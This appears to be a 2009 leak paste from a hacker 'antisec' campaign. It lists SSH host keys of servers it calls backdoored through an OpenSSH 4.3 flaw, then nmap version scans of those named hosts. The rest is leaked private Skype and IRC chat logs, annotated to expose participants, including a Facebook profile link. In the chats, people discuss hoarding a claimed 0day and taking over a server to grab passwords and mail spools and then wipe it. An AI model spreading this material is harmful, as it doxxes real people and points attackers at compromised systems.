88.196.163.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4wjPA3bTL9ZvD137cH5sn8QnvuyMiZN13SF1gnojBAVC2EA1xO0F9okHLukDL+gTEOpbN+JA0W4rMrzAe58+dhSBpSSJlGnNwb14jLEp6GxYDn31+SRns8RWgprq7b/AD7aBUimlE2ExB9I57HIm31XVfO5QsMlg9EW2//4E6vU=
ntora.eml.ee,194.204.32.101 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzoxPtx6AsAOJ+ZZmvtHHBWDi+mH9meDP24M9FPpxAn7lmoXDFlftNURU83/LjTMcym+jsbPVFMC3w6HrRyQQ8v8GFJVR9z/hfKFlUzEUEO7TX1UK39Mswo90wbTwhOpwD3/XkP6YsPZQwN+EN5x37oH9PCXs9KxVCAju0alSrw0=
72.20.18.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
corp.efnet.net,66.63.177.130 ssh-dss AAAAB3NzaC1kc3MAAACBAIEGPI/+Mc3k8MLPbka2tHwx3R61Cg8Vm1R7tvlS7GJuGLUVAfMsEVGKkS/YMLFMoEoAi+vbKAi26YAW82BzJqGSeGNBtEYw6Xs0I6GrWmNKIQQZUEC/M2krMWaTw1ABCIS7K9DGWZFDclWIN73fBKzaWpUyT7X1aLjIBMR9b6nTAAAAFQCAUudmdw3AlJAzG4L5e0tOgHECRwAAAIBTHFmZBp8xyujK0irLERfUFGSMxrqtq4TqpZL0n6Zp/PgsG/TaGgc/B7XLxya3GkzDNnXUO3CtQe/rv5bM+68MwSO+8iFnYid2vinu6C5R1dTAKD9QYKR74U5naARdUnUtOmUVKRPHD9kOlJJuyWYjSCLbxnERzCB8/YHbkvcuYAAAAIAYsHYvOIIDzv7QWN/trtJbYbCAwaKDu0UB/bKN0iMJxxHTRRRfw8TxQ+y9YsfcFPcsMxwKUp+9+q7zjyi6dQ9FLfmMk3TiBiVGZgC20LE5K1TTMYERptzWCI4Ic6HiYAAHEnNxEb0jLmdGMnyWGq89h7AGcGLWPkj4zDn9MMgjmw==
72.20.28.202 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
98.192.246.70 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5iUbneFne+6pmfWqlHfXk19SpS8GAM6peFONJOQXMOhTYKnQvZg+3H4eP0aa3gr0ejDbr/UCyZugRez31OolzZsICM99dSE1yIdD57XFczY0QxffOz5C40dQvlfvNmQXRSptqYygHLJIvm1p6qpyZrnrhRwV5OiNogYLLMQqKRFxOlJWUEa/78mgfQ/LI3Edu1JX79cfhmYKak+WAs+ph3yn70HiFemksr3xJ7G2GQxGsg7jkbAnsrcsSO3KkI99uy9HN+dB2+sEu18kVzEYdKz0T1pjNZ3B5o2B55GhEsoHvrqpBNRmXT7jJcD4v0m0NqYfbFwmj4/x1ykfbmVf7w==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
makosolutions.com,67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3
NMap Scans of all servers compromised
-------------------------------------
1. nmap -v -sV -P0 webhostline.com -p 2222
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
Discovered open port 2222/tcp on 66.96.220.213
Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
NSE: Script scanning 66.96.220.213.
NSE: Script Scanning completed.
Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)
2. nmap -v -sV -P0 -p 22 vitalspeeds.com
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
Discovered open port 22/tcp on 66.197.170.181
Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
NSE: Script scanning 66.197.170.181.
NSE: Script Scanning completed.
Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
3. nmap -v -sV -P0 -p 22 stardustdawn.com
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
Discovered open port 22/tcp on 64.191.69.101
Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
NSE: Script scanning 64.191.69.101.
NSE: Script Scanning completed.
Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
Interesting ports on mx101.stardustdawn.com (64.191.69.101):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
4. nmap -v -sV -P0 -p 2022 irc.indoirc.net
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
Discovered open port 2022/tcp on 70.34.192.50
Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
NSE: Script scanning 70.34.192.50.
NSE: Script Scanning completed.
Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
PORT STATE SERVICE VERSION
2022/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
5. nmap -v -sV -P0 -p 22 absolute.ownage.net
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 12:23
Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
Initiating SYN Stealth Scan at 12:23
Scanning absolute.ownage.net (72.20.28.205) [1 port]
Discovered open port 22/tcp on 72.20.28.205
Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
Initiating Service scan at 12:23
Scanning 1 service on absolute.ownage.net (72.20.28.205)
Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
NSE: Script scanning 72.20.28.205.
NSE: Script Scanning completed.
Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
Interesting ports on absolute.ownage.net (72.20.28.205):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
// OpenSSH upgraded to 5.2
6. nmap -sV -p 22 ircvps.com
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138)
:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
Service detection performed. Please report any incorrect results at http://nmap.
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
7. anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
8. Astalavista
[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ Private Chat Logs ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
--- Log opened Wed Jun 17 09:05:41 2009
09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
09:06 -pand!- Irssi: Starting query in bhf with Glyph
09:07 (RoMeO) wat
09:07 (Glyph) Need to be more 'selective'
09:07 (Glyph) two of two ... tsk, tsk, tsk..
09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it
09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
09:08 (RoMeO) and where did you see me use it? lol
// Everywhere..
09:08 (Glyph) Doesn't what distro, when there's another 'common element'
// OpenSSH <= 4.3
09:08 (Glyph) Just saying need to be more circumspect.
09:08 (Glyph) Not saying 'you'..
09:09 (RoMeO) okay :]
09:09 (Glyph) But I know you'll get w1rd to those responsible.
09:09 (Glyph) Capice?
09:09 (RoMeO) will do
09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
09:11 (Glyph) Rightio.
09:11 (Glyph) two out of two
09:11 (Glyph) Both had a common element.
09:11 (RoMeO) which is
09:11 (Glyph) Besides being shitty about 'security'
09:11 (Glyph) For pay type product.
09:12 (RoMeO) yeah
09:12 (RoMeO) the targetted people are publicized
09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
09:12 (RoMeO) the people who publish exploits
09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
09:13 (Glyph) lol.. not yesterday's demo ;)
09:13 (RoMeO) yesterday was just to prove something to dark
09:13 (RoMeO) he didnt say a word after that
09:13 (Glyph) Aye.. but .....
09:13 (Glyph) tipped the scales in my favour.
09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
09:14 (RoMeO) ofcourse
09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
09:14 (Glyph) But it does lead to disclosure.
09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
09:15 (RoMeO) sure, i understand
09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think.
// Really ?
09:15 (RoMeO) i never underestimate anyone
09:15 (RoMeO) thats my rule
09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
09:17 -> Glyph chuckles
09:17 (Glyph) I'm well aware of that.
09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
09:19 (Glyph) Scratch that.. change pronouns to third person ;)
09:19 (RoMeO) its between me and him ;p
09:19 (RoMeO) he talks alot
09:21 (Glyph) You know I log the publics?
09:21 (RoMeO) i assume alot do
09:22 (RoMeO) i just hope you dont log privates
09:37 (RoMeO) so your job is basically... ?
09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
09:40 (RoMeO) nice, well i will bbl
09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
09:41 (RoMeO) haha
--- Log closed Wed Jun 17 09:46:34 2009
--- Log opened Wed Jun 17 14:21:36 2009
14:21 (Glyph) Aye.
14:22 (Glyph) Don't take the stuff I spin in channel to heart.
14:22 (RoMeO) :)
14:22 (Glyph) I'm interested in debating with Dark.
14:22 (RoMeO) yeah i saw
14:22 (Glyph) Plus it may actually spark some interest in the subject.
14:22 (RoMeO) but again, all he does is talk
14:22 (RoMeO) so what i did when i first met him was
14:22 (RoMeO) to shut him up
14:23 (RoMeO) i put him up on a challenge
14:23 (Glyph) It's a topic that every individual needs to make a decision about.
14:23 (RoMeO) we made some random guy on irc to post a random security site
14:23 (RoMeO) and the challenge was who gets access to it first
14:23 (RoMeO) i got in
14:23 (RoMeO) he didnt
14:23 (RoMeO) but he kept on arguing
14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
14:24 (Glyph) You know what that sounds like to me?
14:24 (RoMeO) what
14:24 (Glyph) 'tempest in a teacup'
14:24 (RoMeO) lol
14:24 (Glyph) Notice he braced me in channel..
14:24 (Glyph) right.
14:24 (RoMeO) right
14:24 (Glyph) 'When did you stop beating your wife sir?'
14:25 (RoMeO) lol.
14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
14:26 (Glyph) hmmm... I've been around a lot longer than that.
14:26 (RoMeO) yea, just saying its not like he does that here only or just now
14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
14:26 (Glyph) Leopard isn't likely to change its spots
14:27 (RoMeO) haha
14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
14:29 (Glyph) I presume you have an account at gso
14:29 (RoMeO) i dont know honestly
14:29 (RoMeO) but if ther was, it would be RoMeO
--- Log closed Wed Jun 17 14:34:34 2009
--- Log opened Thu Jun 18 17:35:20 2009
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
17:35 -pand!- Irssi: Starting query in bhf with Dark
17:36 (RoMeO) we just met on rizon
17:36 (RoMeO) for a small chat
17:36 (Dark) Word
17:36 (Dark) Can I safely assume she's all up in -antisec?
17:36 (Dark) In lieu of recent Astalavista incident?
17:38 (Dark) Well
17:38 (Dark) If you see her around again
17:38 (Dark) Tell her Dark says hi
17:38 (Dark) And thanks for everything
17:38 (RoMeO) what do yoou mean -antisec
17:38 (RoMeO) and willl do
17:39 (Dark) I mean
17:39 (Dark) She's probably restarting her actions
17:39 (Dark) In zfo and whatnot
17:39 (Dark) Just an assumption
17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
17:39 (RoMeO) actions etc
17:39 (Dark) Good to hear
17:39 (RoMeO) ^^
17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
17:40 (Dark) I may attempt to locate her and coax it out of her
17:40 (Dark) Seeing as she's probably not using it anymore
17:40 (RoMeO) yea, she is out of all this for now
17:40 (RoMeO) too busy and whatnot
17:40 (Dark) Haha
17:41 (Dark) She's majoring in CompSci yea?
17:41 (RoMeO) yes ;\
17:41 (Dark) Eh
17:41 (RoMeO) i hate CS
17:41 (Dark) Shoulda known
17:41 (Dark) Same
17:41 (RoMeO) too broad
17:41 (Dark) Fucking Linguistics + Econ for great justice
17:41 (RoMeO) java is gay
17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
17:42 (RoMeO) yeah
17:42 (Dark) Theres a few left here and there
17:42 (RoMeO) everyone gets busy for some time
17:42 (Dark) I wish they'd pop up
17:42 (RoMeO) but they all come back eventually
17:42 (Dark) I guess making a new antisec is where its gotta be
17:42 (RoMeO) i hope anyways
17:43 (Dark) I think defcon should go over well
17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
17:43 (Dark) After that
17:43 (Dark) As I see it
17:43 (Dark) Its all out war
17:43 (RoMeO) rawr
17:43 (Dark) So start saving your exploits nao
17:43 (RoMeO) hidden in sekret boxen ;O
17:44 (Dark) For sure
17:44 (RoMeO) lcirc is being monitored now
17:44 (RoMeO) they host #milw0rm and #bottalk
17:44 (Dark) Probably
17:45 (RoMeO) no like. i know for sure
17:45 (Dark) Monitored by pr0jekt types, or by the feds?
17:45 (RoMeO) pr0ject types
17:45 (Dark) I figured as much
17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
17:46 (Dark) You know what the intentions are?
17:46 (RoMeO) take down after exposure
17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
17:46 (Dark) can't say I've ever really been to lcirc
17:46 (RoMeO) should get them all to stop
17:47 (Dark) Owning milw0rm is a reasonable priority
17:47 (Dark) As well as Secfocus of course
17:47 (RoMeO) it is in the right hands
17:47 (RoMeO) :]
17:47 (Dark) I've been trying to go rogue on some stuff
17:47 (Dark) I'm not part of any group per se now that
17:48 (RoMeO) neither ami
17:48 (RoMeO) doing it on my own
17:48 (RoMeO) i function better solo
--- Log closed Thu Jun 18 18:07:45 2009
--- Log opened Fri Jun 19 09:07:17 2009
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
09:09 (RoMeO) well yea ;D
09:10 (BSDGurl) i was reading the logs this morning and like
09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
09:11 (BSDGurl) i know you will have Internet but still
09:11 (RoMeO) :)
09:11 (RoMeO) thxthx
09:11 (BSDGurl) it's kind of scary
09:12 (BSDGurl) i was scared to start uni here
09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
09:12 (BSDGurl) hahahaha
09:12 (RoMeO) lawl, i am excitted
09:12 (BSDGurl) yes it was like a mix
09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
09:13 (BSDGurl) i hope you learn and are not bored
09:13 (BSDGurl) do you have maths and things?
09:13 (RoMeO) no thanks god
09:13 (BSDGurl) yes
09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
09:14 (BSDGurl) hahahaa java
09:14 (RoMeO) yea...
09:14 (BSDGurl) you know i don't hate java
09:14 (BSDGurl) it's just all those guys
09:14 (RoMeO) i hate it cause of what i hear from those people
09:14 (BSDGurl) they ride the nuts
09:14 (BSDGurl) so hard
09:14 (RoMeO) lmao
09:14 (BSDGurl) it's like
09:14 (BSDGurl) funny
09:15 (BSDGurl) i can't help it
09:15 (RoMeO) this friend of mine in uni now
09:15 (RoMeO) his CS teacher walks in the room daily
09:15 (RoMeO) and screams
09:15 (RoMeO) JAVA IS THE FUTURE
09:15 (RoMeO) :|
09:15 (BSDGurl) rofl
09:15 (RoMeO) true story
09:15 (BSDGurl) they all do
09:15 (BSDGurl) hahahaha
09:15 (RoMeO) thats scary lol
09:15 (BSDGurl) i know
09:15 (RoMeO) how could java be possibly the future
09:16 (RoMeO) possibly be*
09:16 (BSDGurl) that's why i can't help but just say things to piss them off
09:16 (BSDGurl) i don't even care
09:16 (RoMeO) every lang got its use, kthxbai
09:16 (BSDGurl) i am like no
09:16 (BSDGurl) i don't even know java
09:16 (RoMeO) me too lmao
09:16 (BSDGurl) it maybe the future for all i know
09:16 (BSDGurl) hahaha
09:16 (RoMeO) future of wat xD
09:16 (BSDGurl) i just imagine them all pissed off
09:16 (RoMeO) lmao
09:16 (RoMeO) 'oh shit'
09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
09:18 (RoMeO) gay
09:18 (BSDGurl) cos this place is so dea
09:18 (BSDGurl) d
09:18 (BSDGurl) of course it was like
09:18 (BSDGurl) you are some pic
09:18 (BSDGurl) or this or that
09:18 (RoMeO) lol wow
09:18 (BSDGurl) i swear i can't go anywhere
09:18 (RoMeO) ;(
09:18 (RoMeO) - /nick BSDBoi
09:18 (BSDGurl) haha
09:18 (RoMeO) lolol
09:19 (BSDGurl) i don't understand i
09:19 (BSDGurl) t
09:19 (RoMeO) its internet
09:19 (BSDGurl) you know the big deal
09:19 (BSDGurl) oh and the guy
09:19 (BSDGurl) the one you banned that asked me if i was nell
09:19 (RoMeO) lol yea
09:19 (BSDGurl) he joined bhf and said
09:19 (BSDGurl) this chan is for fags
09:20 (BSDGurl) then left
09:20 (BSDGurl) rofl
09:20 (RoMeO) ;O
09:20 (RoMeO) he gots issues
09:20 (BSDGurl) so you know i am expecting people to say
09:20 (BSDGurl) bsdgurl this is you
09:20 (BSDGurl) and show me someone named nell now
09:20 (BSDGurl) hahaha
09:20 (RoMeO) xD
09:20 (RoMeO) 'i had you on myspace'
09:20 (RoMeO) wat
09:20 (RoMeO) .
09:21 (BSDGurl) i know
09:21 (BSDGurl) god being on that site
09:21 (BSDGurl) i was years ago
09:21 (RoMeO) facebook is nice ;p
// http://www.facebook.com/profile.php?id=1119054258 :)
09:21 (BSDGurl) like i haven't been for at least 2
09:21 (BSDGurl) no lie
09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
09:22 (RoMeO) haha
09:22 (BSDGurl) you know because you could custom it
09:22 (RoMeO) yeah
09:22 (RoMeO) not a myspace fan
09:22 (RoMeO) tho
09:22 (BSDGurl) me either now
09:22 (RoMeO) facebook is simple and good
09:22 (BSDGurl) i have an account
09:22 (BSDGurl) it's fake
09:23 (RoMeO) lol i hae a fake account with my public email there
09:23 (BSDGurl) last log in was december i think
09:23 (RoMeO) and i lol when people join dmz to tell me
09:23 (RoMeO) 'hello john genter'
09:23 (RoMeO) cause the name there is john genter
09:23 (RoMeO) lmfao
09:23 (BSDGurl) rofl
09:23 (BSDGurl) i hate that myspace shit though
09:23 (BSDGurl) seriously
09:24 (RoMeO) yeah
09:24 (BSDGurl) so yeah i am nell
09:24 (BSDGurl) haha
09:24 (RoMeO) hai nell
09:24 (RoMeO) xD
09:24 (RoMeO) http://www.nellmcandrew.tv/
09:24 (BSDGurl) i am curious to see if meathive stays
09:24 (RoMeO) i lol'd
09:25 (BSDGurl) last night he was really pissed at asta
09:25 (RoMeO) yea i saw
09:25 (BSDGurl) i told him you know the servers aren't related
09:25 (BSDGurl) but i don't think he believed me
09:25 (RoMeO) what servers
09:26 (RoMeO) irc and web?
